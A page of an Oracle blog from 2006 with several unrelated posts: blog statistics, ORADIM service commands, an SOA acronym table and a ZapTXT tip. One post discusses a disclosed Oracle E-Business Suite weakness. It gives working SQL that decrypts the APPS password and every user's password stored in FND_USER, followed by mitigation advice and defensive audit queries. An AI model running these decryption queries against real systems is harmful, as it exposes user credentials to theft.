As we say bye bye to 2006, I would like to thank you, my dear reader, for reading my blog and spending part of your time leaving comments and feedback.
For me, the highlights of 2006 were:
I would also like to share with you some statistics from the past 12 months (as per Google Analytics and Feedburner):
Top 10 pages
The following pages received the most hits during 2006:

Top 10 browsers
Internet Explorer was the most popular followed by Firefox:

Top 10 countries
Almost half of the traffic originated from the US and the UK:

Top referrers
Google was responsible for more than 65% of the traffic, and 10% of the visits were direct, i.e. from bookmarks or directly typing the blog URL:

The number of subscribers to the blog feed has been steadily growing:


In 2007 I will continue to blog about whatever I find interesting and useful to both you and me.
Here on the west coast of the United States, we celebrate the new year later than the rest of the world. At the time of this writing, there are almost 12 hours until we welcome the arrival of 2007.
My next post will be next year.
Happy New Year!
Filed in ColdFusion, Google, Oracle, WordPress with Comments Off | Tags: blog, new-year

There was a question on OraQA about how to stop Oracle XE from starting up with your computer. When you install Oracle XE on Windows, it creates a service called “OracleServiceXE” with a startup type of “Automatic” which means that the service starts automatically when the computer boots.
One way to prevent Oracle XE from starting up automatically is to change the startup type of the Oracle service to “Manual”. You can do that by navigating to your Control Panel -> Administrative Tools -> Services, double click on the Oracle service and change the Startup type to Manual.
Another way to prevent Oracle XE from starting up automatically when Windows starts is to use the ORADIM command-line tool that is available with the Oracle database. From the DOS command line execute the following:
oradim -edit -sid XE -startmode manual
Now, when you want to use Oracle XE, you start it up like this:
oradim -startup -sid XE
And you shut it down like this:
oradim -shutdown -sid XE
Or you can use the “Start Database” and “Stop Database” shortcuts installed with Oracle XE. Navigate to Start -> All Programs -> Oracle Database 10g Express Edition ->

Now you know how you can squeeze out a bit of extra performance from your computer when you are not using Oracle XE.
Sources and Resources:
Filed in Oracle, Tips with 1 Comment | Tags: xe

Here is an interesting post about things you should avoid blogging about. I could not agree more with the following:
…There’s no real point to those “I can’t blog ’cause I’m too busy” posts other than giving a cop-out for not keeping up with your blog. People come to your blog to read your content, not your excuses for not producing your content…
What also puzzles me is why some bloggers apologize for not blogging as frequently as they think they should or as frequently as they used to. They usually start their posts with: “I’m sorry for not blogging recently. I have been busy doing bla bla bla”. I do not see the need for an apology here, do you?
So, I’m not going to apologize for not blogging as frequently as I used to recently, I just felt that I wanted to take a short break.
I also have my parents visiting from Lebanon. My mom is a great cook; I have been enjoying her delicious Lebanese dishes every day, and gaining more weight every day. Moreover, my soon-to-be three-month-old baby Julie is keeping us really busy. Oops! Did I say busy?!
Finally, I would like to wish you all a very Merry Christmas and happy holidays.
Filed in Interesting Stuff, Personal with 9 Comments | Tags: xmas

Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:
SQL> desc fnd_user;
Name                                      Null?    Type
----------------------------------------- -------- ----------------
USER_ID                                   NOT NULL NUMBER(15)
USER_NAME                                 NOT NULL VARCHAR2(100)
LAST_UPDATE_DATE                          NOT NULL DATE
LAST_UPDATED_BY                           NOT NULL NUMBER(15)
CREATION_DATE                             NOT NULL DATE
CREATED_BY                                NOT NULL NUMBER(15)
LAST_UPDATE_LOGIN                                  NUMBER(15)
ENCRYPTED_FOUNDATION_PASSWORD             NOT NULL VARCHAR2(100)
ENCRYPTED_USER_PASSWORD                   NOT NULL VARCHAR2(100)
...
The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores the encrypted value of the guest user.
To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;
The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.
So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:
WITH guest AS
     (
        SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
               UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                              1,
                              INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                     '/'
                                    )
                              - 1
                             )
                     ) user_name
          FROM DUAL)
SELECT fnd_web_sec.decrypt (guest.user_pwd,
                            fnd_user.encrypted_foundation_password
                           ) apps_password
  FROM fnd_user,
       guest
 WHERE fnd_user.user_name = guest.user_name
Using the above query as a subquery, we can now decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:
WITH guest AS
     (
        SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
               UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                              1,
                              INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                     '/'
                                    )
                              - 1
                             )
                     ) user_name
          FROM DUAL)
SELECT   fnd_user.user_name,
         fnd_web_sec.decrypt
            ((SELECT fnd_web_sec.decrypt
                        (guest.user_pwd,
                         fnd_user.encrypted_foundation_password
                        ) apps_password
                FROM fnd_user,
                     guest
               WHERE fnd_user.user_name = guest.user_name),
             fnd_user.encrypted_user_password
            ) decrypted_user_password
    FROM fnd_user
ORDER BY fnd_user.user_name
VOILA!
Of course, in order for the above queries to work, you have to have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance and assuming that passwords are not reset when a development instance is refreshed from a production instance, this can represent a serious security risk.
Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method. So, no need to even have access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords, like making sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW, changing the passwords for all Oracle Applications 11i seeded accounts, creating all new user accounts with strong and unique passwords and limiting access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts.
Updated January 9 2007: Oracle Applications Password Decryption (PDF)
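The access recommendations and the package-modification precondition described above can be checked from the data dictionary. The following audit queries are an added example, not code from the original post or from Kost's write-up; they assume a DBA session with access to the DBA_* dictionary views and use only the object names given in the post.

```sql
-- Added audit example (not from the original post). Run as a DBA.
-- Object names are the ones named in the post: APPLSYSPUB, APPS.FND_USER_VIEW,
-- APPLSYS.FND_USER, APPLSYS.FND_ORACLE_USERID, APPS.FND_WEB_SEC.

-- 1. APPLSYSPUB should not be able to read APPS.FND_USER_VIEW.
--    Any row returned is a grant to revoke.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE grantee = 'APPLSYSPUB'
   AND owner = 'APPS'
   AND table_name = 'FND_USER_VIEW'
   AND privilege = 'SELECT';

-- 2. Direct object grants on the tables that hold the encrypted passwords.
--    Review every grantee that is not a DBA-controlled account.
SELECT grantee, owner, table_name, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'APPLSYS'
   AND table_name IN ('FND_USER', 'FND_ORACLE_USERID')
 ORDER BY table_name, grantee, privilege;

-- 3. Object grants do not show access obtained through system privileges.
--    List who can read any table or create/alter any stored program unit.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('SELECT ANY TABLE',
                     'CREATE ANY PROCEDURE',
                     'ALTER ANY PROCEDURE')
 ORDER BY privilege, grantee;

-- 4. The post describes DECRYPT as private to the package body, so a
--    reference to it in the package specification warrants review.
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE owner = 'APPS'
   AND name = 'FND_WEB_SEC'
   AND type = 'PACKAGE'
   AND UPPER (text) LIKE '%DECRYPT%'
 ORDER BY line;

-- 5. When was the package last recompiled? Compare LAST_DDL_TIME with the
--    most recent patch or clone date recorded for the instance.
SELECT owner, object_name, object_type, status, created, last_ddl_time
  FROM dba_objects
 WHERE owner = 'APPS'
   AND object_name = 'FND_WEB_SEC'
   AND object_type IN ('PACKAGE', 'PACKAGE BODY')
 ORDER BY object_type;
```

Running the same queries on every development and test clone matters as much as on production, since the post's scenario relies on a refreshed instance that still holds production password values.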
Filed in Oracle, Security with 18 Comments | Tags: E-Business-Suite, hack

Yesterday, I received the following email:
Hi, We’d bought oracle 10g with RH Enterprise Linux in 2005. After year of a smooth
operation we’re having following problems with Oracle 10g.
– system shutdowns once a day automatically
– listener could not find available handler for requested type of server .
Listener failed to start. But registered with the listener and that the
appropriate handlers are accepting connections.
We can’t figure it out why the server is suddenly shutdowns. Can you provide us
solution solving this problem.
Looking forward hearing from you,
Regards,
Now, how am I supposed to reply? I’m almost tempted to send him here, but this is not a “read the manual” issue, it is much worse than that. This is one example of how you ask for help the wrong way.
So, how do you ask for help the right or the smart way? Well, provide details. Details like the type and version number of your database and operating system, error messages, test scenarios, test data, test scripts. Am I missing something?
In short, the more specific you are in describing your problem, the better the chance that someone will respond with a solution.
I guess I will reply with the following two links:
I’m having too much fun with PikiPimp this Sunday evening
During the next few months I will be involved in migrating our current E-Commerce system to a new architecture, namely service-oriented architecture, or SOA for short. So, in order to learn SOA and its components, I downloaded and installed Oracle JDeveloper and the Oracle SOA suite on my personal computer.
I installed the SOADEMO schema and its objects on my Oracle XE database and went through the Oracle SOA Suite tutorial from start to finish. I have found the tutorial to be very useful and essential to getting started with SOA and especially BPEL and ESB (how do you pronounce BPEL?).
Notice that in the short paragraph above, I used three acronyms: SOA, BPEL and ESB. Well, if you want to dive into SOA, you will be swimming in a sea of acronyms. So, in order to keep my head straight, and hopefully yours too, the following is a list of acronyms I encountered while going through the tutorial (sorted alphabetically):
| Acronym | Meaning | Description |
| --- | --- | --- |
| ADF | Application Development Framework | An end-to-end J2EE framework that simplifies development by providing out of the box infrastructure services and a visual and declarative development experience. |
| ANT | Another Neat Tool | A software tool for automating software build processes. It is written in the Java language, requires the Java platform, and is best suited to building Java projects. |
| API | Application Programming Interface | The interface that a computer system, library or application provides in order to allow requests for services to be made of it by other computer programs, and/or to allow data to be exchanged between them. |
| B2B | Business-to-Business | Refers to automated processes between trading partners. |
| BAM | Business Activity Monitoring | Solution for building interactive, real-time dashboards and proactive alerts for monitoring business processes and services. |
| BPA | Business Process Analysis | Solution to perform process modeling & analysis, simulation and publishing of process models. |
| BPEL | Business Process Execution Language | Enables enterprises to orchestrate disparate applications and Web services into business processes. |
| DIME | Direct Internet Message Encapsulation | A Microsoft-proposed internet standard for the transfer of binary and other encapsulated data over SOAP. |
| EAI | Enterprise Application Integration | The use of software and computer systems architectural principles to integrate a set of enterprise computer applications. |
| EAR | Enterprise Application aRchive | A way of creating a portable collection of logically related Java 2 Platform, Enterprise Edition (J2EE) components. |
| EDA | Event-Driven Architecture | Provides the capabilities to easily create, process, analyze, and manage events with limited coding. |
| EDI | Electronic Data Interchange | The computer-to-computer exchange of structured information, by agreed message standards, from one computer application to another by electronic means and with a minimum of human intervention. |
| EIS | Enterprise Information System | Any kind of computing system that is of "enterprise class". This means typically offering high quality of service, dealing with large volumes of data – capable of supporting some large organization. |
| EJB | Enterprise Java Bean | The server-side component architecture for Java Platform, Enterprise Edition (Java EE). EJB technology enables rapid and simplified development of distributed, transactional, secure and portable applications based on Java technology. |
| ESB | Enterprise Service Bus | Moves data among multiple endpoints. It uses open standards to connect, transform, and route business documents (as Extensible Markup Language (XML) messages), among disparate applications. |
| J2EE | Java 2 platform, Enterprise Edition | A set of coordinated specifications and practices that together enable solutions for developing, deploying, and managing multi-tier server-centric applications. |
| JAAS | Java Authentication and Authorization Service | An API that enables Java applications to access authentication and access control services without being tied to those services. |
| JAR | Java ARchive | A collection of class files packaged with the ZIP file format. |
| JAXB | Java Architecture for Xml Binding | Provides a convenient way to bind an XML schema to a representation in Java code. This makes it easy for you to incorporate XML data and processing functions in applications based on Java technology without having to know much about XML itself. |
| JAX-RPC | Java Api for Xml-based RPC | Used to build Web applications and Web services, incorporating XML-based RPC functionality according to the SOAP 1.1 specification. |
| JCA | Java Connector Architecture | Provides a Java technology solution to the problem of connectivity between the many application servers and today’s enterprise information systems (EIS) |
| JDBC | Java DataBase Connectivity | An API for the Java programming language that defines how a client may access a database. |
| JMS | Java Message Service | A messaging standard that allows application components based on the Java 2 Platform, Enterprise Edition (J2EE) to create, send, receive, and read messages. |
| JNDI | Java Naming and Directory Interface | A part of the Java platform, providing applications based on Java technology with a unified interface to multiple naming and directory services. |
| JSF | JavaServer Faces | A technology that simplifies building user interfaces for JavaServer applications. |
| JSP | JavaServer Pages | A Java technology that allows software developers to dynamically generate HTML, XML or other types of documents in response to a Web client request. |
| JSR | Java Specification Request | Formal documents that describe proposed specifications and technologies to be added to the Java platform. |
| JTA | Java Transaction Api | Standard Java interfaces between a transaction manager and the parties involved in a distributed transaction system: the resource manager, the application server, and the transactional applications. |
| LDAP | Lightweight Directory Access Protocol | A networking protocol for querying and modifying directory services running over TCP/IP. |
| MIME | Multipurpose Internet Mail Extensions | A set of extensions to the Internet Mail standards that supports the inclusion of multi-part and multimedia files, such as sound and video, in e-mail messages. |
| MVC | Model-View-Controller | A design pattern that decouples data access and business logic from data presentation and user interaction, and introduces an intermediate component: the Controller. |
| OC4J | Oracle Containers for J2EE | The core J2EE runtime component of Oracle Application Server. |
| OEMS | Oracle Enterprise Messaging Service | A standards based solution built on the Java Message Service (JMS) and the J2EE Connector Architecture (JCA) which allows customers to develop and integrate distributed applications. |
| OID | Oracle Internet Directory | An LDAP v3 directory that leverages the scalability, high availability and security features of the Oracle Database. |
| OPMN | Oracle Process Manager and Notification | OPMN is installed and configured with every Oracle Application Server installation type and is essential for running Oracle Application Server. OPMN enables you to manage your Oracle Application Server instance in a hierarchical fashion as part of a cluster topology. |
| OWSM | Oracle Web Services Manager | Oracle Web Services Manager is a comprehensive solution for adding policy-driven best practices to all your existing or new Web services and provides the key security and management capabilities necessary to deploy Service-Oriented Architectures across your line-of-business applications. |
| POJO | Plain Old Java Object | The name is used to emphasize that the object in question is not somehow special but an ordinary Java Object, in particular not an EJB |
| REST | REpresentational State Transfer | An XML-based protocol for invoking Web services over HTTP. REST is a lighter version of SOAP. |
| RMI | Remote Method Invocation | Provides for remote communication between programs written in the Java programming language. |
| SOA | Service-Oriented Architecture | An architecture that facilitates the development of modular business services that can be easily integrated and reused. |
| SOAP | Simple Object Access Protocol | A protocol for exchanging XML-based messages over computer network, normally using HTTP. |
| UDDI | Universal Description Discovery and Integration | A Web-based distributed directory that enables businesses to list themselves on the Internet and discover each other, similar to a traditional phone book’s yellow and white pages. |
| WAR | Web ARchive | A ZIP file used to distribute a set of Java classes |
| WSDL | Web Services Description Language | An XML-based language for defining Web services. |
| WSIF | Web Services Invocation Framework | A simple Java API for invoking Web services, no matter how or where the services are provided. |
| WSM | Web Services Manager | A comprehensive solution for adding policy-driven best practices to all your existing or new Web services and provides the key security and management capabilities necessary to deploy Service-Oriented Architectures across your line-of-business applications. |
| XML | eXtensible Markup Language | A meta-language that allows you to completely describe a class of other languages, which in turn describe documents. |
| XSD | Xml Schema Definition | An XML document that describes the structure of another XML document. |
| XSL | eXtensible Stylesheet Language | A family of transformation languages which allows one to describe how files encoded in the XML standard are to be formatted or transformed. |
| XSLT | eXtensible Stylesheet Language Transformation | Software that converts an XML document into another format such as HTML, PDF or text. It may also be used to convert one XML document to another XML document with a different set of XML tags |
With the increase in the number of blogs aggregated by OraNA, categorizing blogs into smaller groups, each with its own theme and its own feed, may be a good idea (for me, I still want to keep track of everything).
For example, there are aggregators that aggregate blogs about JDeveloper and others that aggregate blogs about Oracle E-Business Suite. But, is this the best way to keep track of your favorite topic? Well, the keyword here is topic. Aggregators aggregate blogs not topics. A blogger who writes about Java and has a Java related blog for example, may also write about other topics that have nothing to do with Java.
So, is there a better way to keep track of your favorite (Oracle specific) topics? The answer is yes. You use the OraNA feed and ZapTXT.
ZapTXT is a free service that lets you keep track of RSS enabled web sites in real time. Just tell ZapTXT what topic (by keywords) you’re interested in and which feed(s) you’d like to monitor, and ZapTXT will notify you by email, instant messenger or mobile device whenever your keywords appear in the feed(s). You will even get a unique RSS feed for your notifications.
Once you have created an account with ZapTXT, you are all set to create “ZapTasks”. A ZapTask is a set of keywords you enter to monitor a given RSS or Atom feed that you specify. You can add your own feed, select one from a list of tags or create an OPML file to monitor keyword(s) across multiple feeds. You can specify multiple keywords separated by boolean operators like AND and OR. You can also enter a phrase in the keywords field and enclose it in quotation marks to perform an exact match.
Once you have created a ZapTask,
For example, you can create a ZapTask to monitor the OraNA feed for any occurrence of “jdeveloper OR jdev OR adf”. As soon as your keyword appears in the feed you get a notification.

And here is an example of an e-mail notification:
ZapTask: name of your search
Title: Title of the blog where your keyword was found
A snippet of the blog post where your keyword was found
Link to full posting: URL
To see past alert results go to: http://zaptxt.com/myzaptasks/
ZapTXT is a very useful service that helps you stay up to date and focused on your favorite topics.
Filed in Interesting Stuff, Oracle, Technology, Tips with 3 Comments | Tags: aggregator, blog